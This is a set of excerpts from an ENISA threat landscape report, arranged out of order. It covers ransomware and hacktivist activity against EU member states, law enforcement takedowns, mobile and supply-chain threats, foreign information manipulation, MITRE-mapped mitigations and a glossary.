6.4.2 Evolution of the ecosystem As previously mentioned, the cybercriminal ecosystem underwent frequent disruptions, stemming from internal competition, alliances and LEA operations213. The first half of 2025 notably saw several RaaS shutdowns, including BlackBasta in February 214 215and RansomHub in April 2025216. The latter was announced to have joined the DragonForce-led coalition alongside RansomBay in the same month217. Since then, while DragonForce primarily claimed ransomware incidents in the US, 19 EU MSs organisations were listed on their DLS. Having faced a coordinated LEA operation as well as sanctions against one of their affiliates also linked to Evil Corp in October 2024218 219, LockBit operations were impacted by the compromise, defacement and leaking of their affiliate management panel, and since May 2025 the group seems to have cease their activities. Whether the newly documented LockBit4 operator Syrphid is a former LockBit affiliate was not known at the time of reporting220. Multiple operations aiming at disrupting cybercriminal activities across the full supply chain included operations against the communication means of cybercriminals, as illustrated by the dismantling of the Ghost encrypted communications platform in September 2024221 222, cybercrime forums such as Cracked,

impacted the Busitalia Veneto app and subscription portal, and ATM Milano16 17. Other relevant examples include the targeting of Berliner Verkehrsbetriebe (BVG)’s external service provider in May 2025, affecting the data of 180 000 BVG customers18, and unauthorised access to Spanish energy company Repsol’s customers, resulting from the compromise of one of the company’s providers19. Adversaries were also seen exploiting the digital supply chain, notably by compromising software, repositories or browser extensions20. Since 2022, and increasingly observed over the reporting period, DPRKnexus Lazarus leveraged supply chain compromise, with its most recent activities pertaining to the deployment of malicious Node Package Manager (npm) packages in GitHub repositories, mimicking legitimate libraries to compromise developers’ environments21 22 23. Of note, repositories remain particularly exposed to secret sprawls stemming from insufficient protection with detected secrets reportedly increasing by 25% between 2023 and 202424. A surge in attacks leveraging malicious browser extensions was observed in late 2024, with a campaign that compromised multiple companies’ Chrome browser extensions; these notably targeted extensions related to Artificial Intelligence and Virtual Private Networks (VPN)25 26 27 28.

4.3 CONTINUOUS TARGETING OF MOBILE DEVICES Q1 2025 observed an increased level of reporting pertaining to the targeting of mobile devices, with Android devices facing a higher level of threat. Q3 2024 reportedly saw an uptick in the exploitation of outdated devices by the deployment of the Rafel RAT, primarily targeting Android devices for financially-motivated and cyberespionage purposes, notably in Czechia, France, Germany, Italy and Romania29, as well as the re-emergence of the Medusa banking trojan updated with new features, and expanding their victimology to France and Italy30. Medusa was notably observed focusing on On-Device Fraud (ODF) through Account Takeover (ATO). Leveraging the same technique, BingoMod RAT was observed draining bank accounts and wiping devices, a concerning evolution31. Android spyware for surveillance purposes used by State-aligned intrusion sets were also increasingly documented, with Reaper’s Android spyware KoSpy32, or Android spyware BoneSpy and PlainGnome leveraged by Uzbekistan-nexus Sandcat. Of particular interest is a report documenting EagleMsgSpy, a legal intercept surveillance program targeting Android devices, reportedly developed by Wuhan Chinasoft Token Information Technology Co., Ltd. and used by Chinese Public Security Bureaus since at least 2017 33. In February, multiple cybersecurity vendors published reports pertaining to the targeting of mobile devices by Russia-nexus intrusion sets. Google Threat Intelligence Group (GTIG) reportedly observed Sandworm, UNC5792, UNC4221 (aka UAC-0185) targeting the WhatsApp, Signal and Telegram accounts of individuals in Ukraine34. Notably Sandworm was observed enabling Russian military forces to connect Signal accounts on devices collected on the battlefield to actor-controlled infrastructure for follow-on exploitation. Sandworm was also observed abusing the ‘linked devices’ feature, by crafting malicious QR codes to link a victim's account to an actor-controlled Signal instance, and operating WAVESIGN. Volexity and Microsoft also reported on the

Consistently targeted over the reporting period and across all EU MSs, public administration was the most targeted sector, specifically governmental websites (51.5%) and municipalities (34%). The most impacted EU MSs overall were Italy, France, Spain, Poland and Germany, and the most active hacktivist groups targeting this sector were NoName057(16), Dark Storm Team, Mr Hamza, Keymous+ and Mysterious Team Bangladesh. As an EU MS supporting Ukraine and the host country of several EU and international organisations, the targeting of public administration in Belgium remains prevalent, with incidents related to this sector representing a disproportionately high share of Belgium’s overall targeting, often accounting for more than half of all incidents. This iteration also saw an increased targeting of intelligence and security services, with incidents concentrated in a few EU Member States in Eastern and Northern Europe where law enforcement has taken high-profile actions against hacktivist groups. These attacks tend to occur as retaliatory spikes rather than sustained campaigns, reflecting hacktivist attempts to signal against domestic security institutions. Accounting for 6.1% of all recorded hacktivist-led incidents, the transport sector was particularly targeted in Poland, Germany and Italy, with a prevalence of attacks on air and rail transport entities. NoName057(16), Dark Storm Team, Mr Hamza, Keymous+ and RipperSec were reportedly the most active groups in targeting this sector. The same group of hacktivists were also recorded targeting the finance sector, with a focus on the publicfacing portals of banks, particularly in Italy, Spain and France. While less prevalent and quite volatile from one month to the next, the targeting of digital infrastructure by hacktivist groups is of particular concern due to its potential for systemic, cross-border impact. This sector was seen targeted by NoName057(16), RipperSec, Dark Storm Team, Keymous+ and Mr Hamza, with the most targeted EU MSs being Germany, the Netherlands and France. Interestingly, the manufacturing sector, especially defence-related and automotive-related entities, were seen particularly targeted by RipperSec, followed by NoName057(16), Dark Storm Team, Keymous+ and Mr Hamza; these attacks were most prevalent in Germany and Poland. Finally, the French and German media/entertainment sector, specifically news outlets and broadcasters, were in particular targeted over the reporting period, with the most active groups including Mr Hamza, NoName057(16), Dark Storm Team, Keymous+ and RipperSec.

9.4 KEY HACKTIVISM TRENDS 9.4.1 Tactics, Techniques and Procedures (TTPs) In addition to adopting allegedly advanced TTPs for DDoS attacks, hacktivist groups were increasingly reported leveraging ransomware, as well as targeting OT. Multiple open-source reports notably documented the use of carpet bombing437 or routers leveraging as well as AI to increase intensity and the potential impact of their DDoS attacks. According to a report by Netscout related to the first semester of 2024, bot-infected devices rose by 50%, largely due to the emergence of the Zergeca botnet alongside the evolving DDoSia botnet used by NoName057(16), which employs DNS over HTTPS (DoH) for Command and Control (C2) activities. Leveraging or transitioning to ransomware is particularly prevalent among pro-Russia groups, as illustrated by the launch of their own RaaS by the CyberVolk’s, Azzasec, Funksec and Lapsus$ groups438 439 440. KillSecurity, originally a pro-Russia hacktivist group aligned with Anonymous, transitioned into a notable player in the ransomware landscape following the

Nulled and BreachForums223 224 225, and the seizure of the servers of cryptocurrency exchanges suspected of being used to launder financial flows, notably originating from ransomware operations 226. The 28 October 2024 takedown of RedLine and META infostealers under Operation Magnus resulted in multiple arrests and server seizures across Europe and the US227 228. These efforts continued with the arrest of four leaders of the 8Base group on 10 February, which significantly reduced Phobos ransomware activity 229. A subsequent phase of Operation Endgame from 19–22 May 2025 neutralised seven malware families — Bumblebee, Lactrodectus, Qakbot, Hijackloader, DanaBot, Trickbot, and Warmcookie—commonly used by Initial Access Brokers (IAB) to breach victim systems and enable the deployment of ransomware 230. Law enforcement also focused on dismantling the services and networks that facilitate other forms of cybercrime.

On 4 June 2024, Portuguese and Spanish authorities arrested 54 suspects in a vishing operation231. Between 10–17 September, Europol coordinated an operation with Ameripol that dismantled a phishing network, which unlocked over 1.2 million stolen mobile phones and resulted in 17 arrests 232. Other notable takedowns included the arrest of a suspect linked to DoppelPaymer ransomware in Moldova on 12 May233 234 235, and Operation Macefall on 21 May, which seized over 2 300 domains tied to LummaStealer infostealer operations236. The month also saw authorities take down a group providing crypting and counterantivirus services on 27 May237.

9.2 HACKTIVISM GEOGRAPHICAL TARGETING Over the reporting period, hacktivism-related activities in the EU mostly targeted organisations in France, Italy, Poland, Germany and Lithuania. While not all of them were necessarily linked with hacktivism, France was reportedly the second most targeted country in the world by DDoS attacks in 2023410. Peaks in activity identified in this EU MS were congruent with potentially divisive issues relevant to the political and societal national context, as well as declarations of support for Ukraine411 412, most notably conducted under the #OPFrance banner 413 414 415 416 417 418. Almost half of hacktivist activities recorded against France were carried out by NoName057(16), followed by Keymous+, Dark Storm Team, Mr Hamza, and RipperSec. While all were seen to be focusing on the public administration sector, Keymous+ appeared to primarily target the finance sector, and NoName057(16) and Keymous+ both claimed attacks against the media/entertainment sector.

It is possible the targeting of France by self-proclaimed pro-Russia and pro-Palestine hacktivist groups stems from the fact that this EU MS is one of the most vocal against Russia’s war of aggression in Ukraine and the Hamas/Israel conflict, and is also a permanent Member of the United Nations Security Council. The top five hacktivist groups targeting Italy included NoName057(16), Dark Storm Team, DXPLOIT, Mr Hamza and Alixsec, notably under the #OPItaly banner which was increasingly used in Q1 2025. While attacks targeting public administration represented X% of the claimed activities of these groups419 420 421, NoName057(16) and Dark Storm Team and DXPLOIT were observed targeting the transport sector. It may be noted that Italy reportedly faced increased targeting of OT systems by Z-PENTEST-ALLIANCE from Q4 2024 onwards. Poland was, in particular, targeted by NoName057(16), Dark Storm Team, SERVER KILLERS, OverFlame, and Keymous+.

More than half of hacktivist claims pertained to the public administration sector, followed by the finance sector, transport, and energy verticals. Of note, the energy sector in Poland appears to be of particular interest to NoName057(16) and OverFlame, both part of the Z-PENTEST-ALLIANCE, which demonstrated intent and capability to target OT systems. In Germany, most active groups included NoName057(16), Keymous+, Dark Storm Team, Mr Hamza and Mysterious Team Bangladesh. Offensive cyber activities targeting the public administration remained prevalent, with one outlier identified as Mysterious Team Bangladesh seemingly focused on targeting the transport and energy sectors. Of interest also is the sustained targeting of finance and manufacturing entities by NoName057(16).

This section discusses the technical coverage of adversary behaviours across the attack lifecycle, mapped directly to MITRE ATT&CK IDs to provide an actionable foundation for SOC teams, detection engineers and threat hunters seeking to prioritise coverage of common attacker techniques and align their defensive strategies with relevant mitigations. The MITRE ATT&CK framework organises real-world observations into a matrix of tactics and techniques, offering detailed examples, detection guidance and mitigations482. The structured mapping highlights a strong defence-in-depth posture, with an emphasis on access controls, privilege restrictions, endpoint visibility and proactive detection of stealthy malicious behaviours.

extended command-and-control activity, blending loader-style entry controls with ransomware-style resilience measures.

Strengthening the foundation of operating environments is central for prevention. Measures include Execution Prevention (M1038) and Behaviour Prevention on Endpoint (M1040). Baseline controls such as Operating System Configuration (M1028), Software Configuration (M1054), Active Directory Configuration (M1015) reduce the attack surface. Additional safeguards include Restrict Registry Permissions (M1024), Restrict File and Directory Permissions (M1022), Restrict Library Loading (M1044). Validation mechanisms such as Code Signing (M1045), Disable or Remove Feature or Program (M1042) further reduce exposure by ensuring only trusted components and essential features are present.

Identity and access controls form a critical line of defence. These include User Account Management (M1018), Privileged Account Management (M1026), User Account Control (M1052), which enforce least-privilege principles. Limit Software Installation (M1033) reduces unauthorised application deployment. To counter credential misuse, Password Policies (M1027) and Multi-Factor Authentication (M1032) strengthen identity assurance, while Account Use Policies (M1035) ensure proper oversight of account activity.

Preventing malicious communication and lateral spread relies on layered network defences. Network Intrusion Prevention (M1031) and Filter Network Traffic (M1037) provide frontline detection and blocking. Network Segmentation (M1030) contains threats within isolated zones, while Restrict Web-Based Content (M1021) reduces exposure to drive-by downloads and malicious sites. To further limit unauthorised communications, Limit Access to Resource Over Network (M1048) enforces strict control over resource availability across the network.

Effective oversight ensures early detection of malicious activity. Audit (M1047) provides system and activity logging, while Application Developer Guidance (M1013) reduces exploitable flaws through secure design. Complementary policies such as Account Use Policies (M1035) and Limit Access to Resource Over Network (M1048) enforce consistent monitoring of identity and network activity to detect anomalies.

Assuming that some attacks may succeed, resilience controls minimize impact and accelerate recovery. Data Backup (M1053) and Remote Data Storage (M1029) ensure continuity of operations. Data Loss Prevention (M1057) and Encrypt Sensitive Information (M1041) protect confidentiality and integrity even under compromise. Preventive measures such as Update Software (M1051) and Antivirus/Antimalware (M1049) reduce exploitable weaknesses, while User Training (M1017) equips staff to recognise and resist social engineering attempts.

leveraging of Signal, as part of a recent spearphishing campaign conducted by CozyLarch UTA0304, UTA0307 and Storm-237235. In October 2024, Qualcomm published a vulnerability impacting its Qualcomm’s Digital Signal Processor (DSP) software36. The vulnerability has an impact on chipsets widely used by various mobile devices and was reported to have been exploited in the wild37. In 2025, iVerify published an in-depth technical report revealing that state-linked telecommunications providers continue to exploit vulnerabilities in outdated mobile signalling protocols—specifically SS7 and Diameter38. These protocols, which underpin global mobile communications, were not designed with encryption or strong authentication, leaving them susceptible to interception, location tracking and session hijacking. iVerify demonstrated that operators with privileged access to international telecom infrastructure— such as China Mobile International and China Telecom Global—can remotely monitor and manipulate mobile communications across borders without needing access to the target’s device. These operations are silent, infrastructure-level and difficult to detect, posing significant risks to diplomats, journalists, and political actors.

4.4 THREAT GROUPS CONVERGING Across the period, the lines between hacktivism, cybercrime and state-nexus activity continued to blur. Intrusion sets historically distinguished by TTPs’ level of advancement. conducted activities, or assessed objectives increasingly shared toolsets and modus operandi. This was notably exemplified by hacktivist-led DDoS waves by pro-Russia groups around electoral events, where increased activity was often observed as typical FIMI-aligned behaviour to associate disruption with aspects of information operations. A prominent facet of this trend is faketivism, where state-aligned intrusion sets leverage hacktivist personas and activities. Notable examples include Cyber Army of Russia Reborn, associated to Russia-nexus Sandworm39, and the CyberAv3ngers group linked to Iran’s IRGC40. In parallel, hacktivist tooling and criminal ecosystems increasingly intersect. FunkSec’s emergence in late 2024 brought FunkLocker ransomware, blending political messaging with financial extortion, underscoring how quickly ideology-driven branding can pivot to monetisation41 42 43. Hacktivists, seeking funding and visibility, embraced ransomware beyond DDoS and defacements. CyberVolk, operating in line with Russian interests, has used and promoted multiple strains—AzzaSec, HexaLocker, Parano, as well as LockBit and Chaos—since May 202444 45 46. KillSec, originally a pro-Russia hacktivist brand aligned with Anonymous, debuted its platform in June 202447. Another aspect of this trend is the false-flag operation carried out by Turla, taking over Transparent Tribe’s infrastructure48 49, or cybercriminals masquerading as other cybercriminal groups or spoofing their brand, as notably seen with email extortion campaigns impersonating the CL0P ransomware group50, physical

ABOUT ENISA The European Union Agency for Cybersecurity, ENISA, is the Union’s agency dedicated to achieving a high common level of cybersecurity across Europe. Established in 2004 and strengthened by the EU Cybersecurity Act, the European Union Agency for Cybersecurity contributes to EU cyber policy, enhances the trustworthiness of ICT products, services and processes with cybersecurity certification schemes, cooperates with Member States and EU bodies, and helps Europe prepare for the cyber challenges of tomorrow. Through knowledge sharing, capacity building and awareness raising, the Agency works together with its key stakeholders to strengthen trust in the connected economy, to boost resilience of the Union’s infrastructure, and, ultimately, to keep Europe’s society and citizens digitally secure. More information about ENISA and its work can be found here: www.enisa.europa.eu.

CONTACT For contacting the authors please use etl@enisa.europa.eu For media enquiries about this paper, please use press@enisa.europa.eu.

AUTHORS Jamila BOUTEMEUR, Ifigeneia LELLA, Ilias BAKATSIS, Georgios CHATZICHRISTOS, Kevin FOLEY, Jussi LESKINEN, Jakub OTCENASEK, Dominik ZIOLEK, ENISA. EEAS STRATCOM.

CONTRIBUTORS The ENISA Threat Landscape authors would like to express their appreciation to the EEAS STRATCOM and Europol EC3 colleagues, as well as the ENISA Incident and Vulnerability reporting services (IVS) and CIRCL colleagues for their active support to the report.

ACKNOWLDGEMENTS The ENISA Threat Landscape authors would like to acknowledge the valuable feedback and validation of the members of the National Liaison Officers (NLO) network, of the CSIRTs Network (CNW), and of the ENISA Cyber Partnership Programme, as well as the comments received from our European Union Aviation Safety Agency (EASA) colleagues, I4C+ (Information and Analysis Center for Cities), the Financial Services Information and Analysis Center (FI-ISAC), and the European Rail Operators Information and Analysis Center (Rail-ISAC). We also want to thank our ENISA colleagues, Apostolos MALATRAS, Stefano DE CRESCENZO , Razvan GAVRILA, Erika MAGONARA, Eleni PHILIPPOU, Edgars TAURINS, and Johannes CLOS for their input and overall support.

LEGAL NOTICE This publication represents the views and interpretations of ENISA, unless stated otherwise. It does not endorse a regulatory obligation of ENISA or of ENISA bodies pursuant to the Regulation (EU) No 2019/881. ENISA has the right to alter, update or remove the publication or any of its contents. It is intended for information purposes only and it must be accessible free of charge. All references to it or its use as a whole or partially must contain ENISA as its source.

A more granular analysis of the sectorial targeting by these intrusion sets shows a particular interest in targeting governments and diplomatic entities, aviation and maritime industries, NGOs and human rights advocacy groups and telecommunications. Slowly emerging as outliers is the targeting of food manufacturing and agricultural research. It is likely these campaigns pertain to strategic data collection and intellectual property theft, mirroring China’s Made in China 2025 (MIC 2025) goals for the acquisition of technology and transport connectivity related to China’s Belt and Road project and logistics strategies in Europe. Civil society targeting likely reflects domestic priorities around narrative control and the monitoring of dissident or diaspora networks. While reportedly increasing in Asia, documented China-nexus cyber threats in the EU was particularly inflated by the compromise of edge devices, notably leveraged in Operational Relay Boxes (ORBs) for follow-up offensive cyber activities, as exemplified by campaigns associated to UNC5221256 257 258reportedly impacting telecommunication providers, manufacturing, aerospace and public administration in the EU.

A similar pattern was seen with Flax Typhoon’s leveraging of the Quad7 botnet, compromising thousands of TP-link routers in Europe259 260 261 262 263. Mustang Panda and APT41 demonstrated a clear focus on maritime and shipping industries, leveraging updated TTPs and toolsets 264 265 266 267 268 269 270 271 272. Mustang Panda was also seen targeting governments and defence-related events in the EU273. Finally, and of particular concern, is the targeting of the telecommunications sector by China-nexus intrusion sets, which is reportedly the unique focus of Liminal Panda, Locksmith Panda and Salt Typhoon274; these were increasingly reported in Asia and the US. In the EU, Salt Typhoon has been active since at least December 2024, with activities continuing in 2025, with at least three EU MSs impacted 275 276.

launch of its RaaS platform in June 2024441, and has targeted multiple EU MSs ever since, with increased activity reported in April 2025. Hacktivist groups continued displaying intent, capacity and opportunity to target OT systems, as illustrated by Z-PENTEST-ALLIANCE’s claimed targeting of Internet-accessible OT management interfaces operated in the energy and water management sectors442, notably in Italy443 444 445 446 447 448 449, Czechia450, Lithuania451 452 453 454 , Poland455, Portugal456, the Netherlands457 and Spain458 459 . While these attacks reportedly did not result in significant operational impact, the sharing of videos showing Z-PENTESTALLIANCE operators tampering with OT systems is assessed to aim at amplifying the threat for psychological impact. Z-PENTEST-ALLIANCE reportedly became the leading hacktivist group targeting critical infrastructure, with a focus on energy infrastructure in the EU, with Italy documented as the most frequently targeted EU MS in OT attacks by hacktivists, followed by the Czechia, France, and Spain460. Z-PENTESTALLIANCE has increasingly proclaimed its intention to target OT since Q1 2025, notably through their alleged association to Russia-nexus intrusion set Sandworm. While Sandworm was previously documented operating the Cyber Army of Russia Reborn (CARR) faketivist group, this claim cannot be verified and is assessed as doubtful at the time of reporting. Emerging in June 2025, the Infrastructure Destruction Squad (IDS)461 reportedly developed the VoltRuptor ICS specific malware, reportedly offering advanced multi-protocol support and advanced persistence and anti-forensics capabilities to enable cross-platform operations. On 30, June 2025, IDS reportedly compromised an Italian smart building automation company462. Of note VoltRuptor is documented as being available for sale on the dark web. As this threat is too recent to assess, the leveraging of the IDS persona by a Russia-nexus intrusion set is a realistic working hypothesis.

9.4.2 Evolution of the ecosystem In addition to previously mentioned hacktivist activities overlapping with cybercrime TTPs and ecosystems, newly formed alliances gathering together hacktivist groups with seemingly distinct ideologies were announced during the reporting period. Further complementing bilateral associations463 464 465 466 , highlights of this increasing trend include the formation of The Holy League, announced in July 2024467, reportedly gathering 70 groups, including proRussia NoName057(16), and pro-Palestine hacktivists, to target Ukraine, Israel and countries perceived as supporting Ukraine and Israel, as well as NATO Allies, including EU MSs. The Holy League notably targeted Spain in retaliation for the arrest of individuals linked to NoName057(16)’s DDoSia, which led to NoName057(16)’s claimed DDoS attacks against multiple Israeli entities presented as a token of appreciation

From an EU vantage point and based on ENISA’s open-source collection, at least 115 exploited vulnerabilities were reported impacting and/or targeting EU MSs organisations489. This includes vulnerabilities that were subject to a coordinated publication of advisories by the European Union CSIRTs Network (CNW) members490 491 and confirmed to be exploited in open sources. While not the only factor, vulnerability distribution also speaks to the equipment rate in the EU. For instance, Microsoft largely dominates across the environments of consumers and public and private organisations492. Further analysis of the ENISA dataset with vulnerabilities matched against MITRE ATT&CK IDs confirms that attackers consistently exploit Internet-facing applications (T1190). Vulnerabilities impacting Confluence, Exchange (ProxyLogon/ProxyShell), Citrix NetScaler, Fortinet/Check Point/Palo Alto VPN appliances, PaperCut, TeamCity, ActiveMQ, vCenter and Zimbra dominate the set — typical of mass-exploitation waves where perimeter services are scanned and compromised within hours of disclosure. A smaller but critical part consists of local privilege-escalation (T1068) under which vulnerabilities such as PwnKit and Windows CLFS were exploited, which enable webshell footholds into SYSTEM/Domain Admin and facilitate lateral movement. On the end-user side, client execution (T1203) remains prevalent (Office Equation Editor, WinRAR, browser zero-days), almost always appearing alongside phishing (T1566.001) or drive-by compromise (T1189) as the delivery vector. These TTPs reflect a combination of opportunistic exploitation of exposed services and targeted postexploitation to maintain persistence, escalate privileges and exfiltrate data.

Based on identified TTPs, including the vulnerabilities listed hereabove, all identified malware types stress execution prevention, endpoint behaviour monitoring, privilege control, network filtering, auditing and user training, forming the baseline of cyber hygiene. Together, the three categories illustrate the need for an evolving defensive posture: from preventing initial compromise, to containing impact, to safeguarding against long-term remote access. For loaders, mitigations focus heavily on blocking initial execution and persistence. Restricting registry, DLLs and software installation are central, reflecting loaders’ role as initial footholds. Mitigation against ransomware build on the loader baseline but emphasise the need for resilience and business continuity. Backup, remote storage, data loss prevention and network segmentation are critical. Identity management (password policies, MFA implementation) is reinforced since ransomware operators rely on credential abuse during lateral spread. Sharing ransomware’s depth mitigation measures against RAT also include controls against long-term persistence (library loading restrictions, account use policies). RAT mitigations reflect both stealthy footholds and

The targeting of the public administration by Russia-nexus threat groups such as APT28, APT29, Turla, and GoldenJackal, is more diverse, impacting diplomatic entities, ministries, law enforcement and political parties, in addition to core government institutions. A newcomer among the most active state-nexus intrusion sets in the EU, Sidewinder demonstrated a clear focus on diplomatic entities and governmental organisations within EU public administrations.

5.2 TRANSPORT While remaining in second position compared to the previous ETL, the number of recorded incidents against the EU transport sector amounted to 7.5% of all incidents across all sectors. Of note, 12% of the incidents with a significant impact reported under the NIS directive in 2024 were incidents in the transport sector109.

The distribution of incidents impacting the transport sector in the EU highlights a concentration of incidents in air transport (58.4%), followed by logistics (20.8%). Of note, it is likely logistics would include entities involved in air, water, road and rail transport.

Yet again, the transport sector was largely impacted by hacktivist-led DDoS attacks (87.6%); the most active hacktivist groups against this sector included NoName057(16) (36.4%), DarkStorm Team (15.4%) and Mysterious Team Bangladesh (6.2%). As previously mentioned, increased activity was triggered by specific events at the EU national level110 111 112 and/or support for Ukraine.

9. HACKTIVISM Despite their minimal impact and low-advanced attacks, hacktivist groups remained the most active threat against EU MSs, with claimed attacks continuously increasing over the reporting period, reaching 79% of total incidents. DDoS attacks against the websites of EU MSs constituted 91.5 % of incidents, with exceptionally low instances of claimed intrusions (5.1%), and data breaches (3.4%). Of particular interest in addition to the increased activity against EU MSs by pro-Russia hacktivist groups is the prevalence of pro-Palestine groups, likely related to announcements of an increasing number of alliances.

9.1 KEY HACKTIVISM THREATS At least 88 hacktivist groups claimed they targeted EU MSs organisations. Pro-Russia nexus hacktivist groups remain prevalent, with 63.1% of attacks claimed by NoName057(16), followed by Keymous+ (14.1%), Dark Storm Team (12.1%), Mr Hamza (7.9%), and RipperSec (2.8%). While the core hacktivist threat landscape is shaped by a few hacktivist groups, it is also populated by shortlived campaigns triggered by specific events with hacktivist groups claiming attacks and then disappearing, with claimed activities ranging from a few days to a few weeks.

The tempo of activity across the five most active hacktivist groups indicated differing operational patterns. Pro-Russia NoName057(16) sustained the highest operational tempo, with continuous campaigns throughout the reporting period and a clear ability to mobilise rapidly across multiple EU states, likely due to their crowd-sourced model operationalised through the DDoSia platform. The Dark Storm Team also demonstrated a steady tempo, with frequent medium-scale operations, while Keymous+ displayed a spike-driven tempo, characterised by bursts of activity in specific quarters, notably against France and Estonia, pointing to possible ad-hoc mobilisation. Mr Hamza’s activity remained episodic, with periods of large-scale attacks followed by lulls. Finally, RipperSec exhibited a low but increasing tempo from September 2024 onwards.

8. FOREIGN INFORMATION MANIPULATION AND INTERFERENCE 8.1 KEY FIMI THREATS This section was jointly written by ENISA and EEAS STRATCOM. Over the reporting period, multiple EU MSs were targeted by FIMI, primarily carried out by Russia-aligned Information Manipulation Sets, with increased activities around electoral events.

8.1.1 Russia-aligned Information Manipulation Sets EEAS collected 86 FIMI operations targeting EU entities or EU MSs institutions. Known Information Manipulation Sets (IMS) accounted for 60.5% of all identified cases. Russia-aligned IMS, including Doppelgänger, Matryoshka, Storm-1516, the Russian Foundation to Battle Injustice and Portal Kombat, conducted FIMI operations against specific EU entities and EU MSs public institutions, notably in France, Germany and Poland. Heavily correlated with current events, identified FIMI aimed at interfering in key events such as elections or opportunistically exploiting breaking news events, including EU political events. Among the 86 identified cases, 52 involved at least one known Information Manipulation Set (IMS) with Matryoshka (18 cases) being the most active. Doppelgänger (6), Storm-1516 (5) and Russian Foundation to Battle Injustice (4) were involved to a lesser extent. In 19 cases, the Portal Kombat infrastructure was used to amplify content341 342. In four additional cases, the case was imputed to another known IMS. Approximately a quarter of the documented FIMI content focused on degrading the Union through negative narratives. High-ranking officials such as the President of the European Commission and the High Representative for Foreign Affairs and Security Policy and the Vice-President of the European Commission were frequently targeted ahead of key strategic events343 or discredited through the circulation of out of context pictures and quotes, disseminated via inauthentic articles and amplified by un-associated accounts344, as well as statements from state-controlled Russian media345. Standing out in terms of both the frequency and diversity of operations against their public institutions, France, Germany and Poland are frequently targeted with narratives aimed at discrediting their government, military and intelligence services, often accusing them of destabilisation efforts abroad or failing in their fundamental duties, such as protecting their own citizens346. Police departments347 and public media outlets348 are commonly at the centre of Matryoshka campaigns, where they are either impersonated or misattributed to

A political determination linking cyber activity to a specific actor or group based on technical and intelligence evidence.

A social engineering tactic tricking users into clicking links to 'fix' fake security issues, often leading to malware.

CVE Numbering Authority, an entity authorised to assign CVE identifiers for vulnerabilities.

Common Vulnerabilities and Exposures, a reference system for publicly disclosed security flaws.

Common Vulnerability Scoring System, a standardised framework for rating software vulnerabilities.

Common Weakness Enumeration, a classification of software weaknesses that can lead to vulnerabilities.

An event that compromises the integrity, confidentiality or availability of information systems, networks, or data.

An incident where sensitive, protected or confidential data is accessed or disclosed without authorisation.

European Vulnerability Database Identifier, a unique identifier for vulnerabilities in the EU context.

Impersonation of a hacktivist persona.

Initial Access Broker, a threat actor who sells or trades access to compromised systems.

A provisional association of cyber activity with an intrusion set, based on technical indicators (aka technical attribution).

Malware designed to steal sensitive information such as credentials, banking data or system details.

A cluster of related intrusion activity imputed to a single threat actor or campaign over time.

Email campaigns that distribute malicious attachments or links to deliver malware.

Use of malicious online advertisements to distribute malware or redirect users to harmful sites.

Employees conducting unauthorised cyber activities or side job, possibly for financial gain.

QR code-based phishing attacks that direct victims to malicious websites or payloads.

An intrusion set or campaign whose objectives allegedly align with a state's interests, without formal state control.

An intrusion set or campaign with alleged direct operational or strategic ties to a nation-state.

A cyberattack exploiting vulnerabilities in suppliers or service providers to compromise downstream entities.

An attack that compromises a partner, supplier or vendor to target another organisation.

A phishing attack conducted over voice calls to trick victims into revealing sensitive information.

A previously unknown flaw in software or hardware exploited before a fix is available.

ABOUT ENISA The European Union Agency for Cybersecurity, ENISA, is the Union’s agency dedicated to achieving a high common level of cybersecurity across Europe. Established in 2004 and strengthened by the EU Cybersecurity Act, the European Union Agency for Cybersecurity contributes to EU cyber policy, enhances the trustworthiness of ICT products, services and processes with cybersecurity certification schemes, cooperates with Member States and EU bodies, and helps Europe prepare for the cyber challenges of tomorrow. Through knowledge sharing, capacity building and awareness raising, the Agency works together with its key stakeholders to strengthen trust in the connected economy, to boost resilience of the Union’s infrastructure, and, ultimately, to keep Europe’s society and citizens digitally secure. More information about ENISA and its work can be found here: www.enisa.europa.eu.

for Holy League’s attacks on Spain468 469. The Holy League was also observed carrying out attacks against the websites of French governmental entities and financial systems470 471 , in the context of the Ukrainian President’s visit to Paris to hold a ‘Trilateral meeting’ with the French President and the then US presidentelect. The hacktivist ecosystem was also impacted by disruptions to their tools and means, as seen with Telegram’s increased cooperation with law enforcement, operationalised through the ban or take downs of more than 60 hacktivist-linked aliases in Q1 2025472. This notably resulted in hacktivist groups migrating to private Telegram rooms473, X474 475, Element476, and dark web forums477. In December 2024, Operation PowerOFF saw LEAs from 15 countries shut down 27 DDoS-for-hire platforms and arrest three administrators478 479 . This effort was expanded in May 2025, when a follow-up operation took six more DDoS-for-hire platforms offline and resulted in four arrests in Poland and nine domain seizures in the US480. Examples of potential identity spoofing were also reported for the first time, with the claimed reappearance of pro-Russian Killmilk in May 2025481 and cases of NoName057(16) impersonations with the use of ransomware decoys.

Akira maintained a continuous but low tempo, SafePay rose to prominence in Q2 2025 145, while Hunters International, which had sustained steady activity in 2024, recorded a decline following a public announcement in 2025 146. RansomHub, previously one of the most deployed ransomware strains in the EU, went offline on 1 April 2025 147, shortly after increased activity around the formation of a new ransomware alliance led by the DragonForce group. Info-stealers sold on cybercriminal marketplaces remained a consistent threat vector during the reporting period, primarily facilitating credential theft, session hijacking and access brokering. Although the impact of infostealers’ leveraging cannot be assessed, they continue to be key enablers of malware deployments, making them a solid and prevalent link in the cybercriminal supply chain, as notably illustrated through the BlackBasta leaks 148. The info-stealers market observed a significant disruption following Operation Magnus in October 2024, which notably led to the dismantling and seizure of the infrastructure of RedLine and META, two prevalent long-running info-stealer families149 150. This led to the increased use of Lumma info-stealer by more than 350% between the first and second halves of 2024 151. Within the EU, between September 2024 and March 2025 waves of Lumma infections were seen in Italy152 153.

original content may be authentic, it is reframed to better fit FIMI narratives and disseminated by unattributed channels (T0049.003 Bots Amplify via Automated Forwarding and Reposting (T0140.001 Defame). • False documents. These were used to target mostly public institutions in EU MSs through misattribution. The documents allegedly ‘leaked’ are disseminated on social media through unattributed channels. (T0003 Leverage Existing Narratives). • Amplification by state-controlled channels. Official Russian and Belarusian state-controlled channels published content aiming to discredit the EU on multiple occasions, which was then disseminated in various languages by unattributed channels and at times the Portal Kombat infrastructure. (T0023 Distort Facts, T0140.001 Defame). • Artificial Intelligence. Over the past year, FIMI actors increasingly relied on Artificial Intelligence (AI) to facilitate their efforts, with 14.3% of recorded cases targeting EU entities and public institutions in EU MSs.

The TTPs shown in the graph hereunder are tagged according to the DISARM framework380 and give a general overview on the type of behaviour and assessed motives of the IMS.

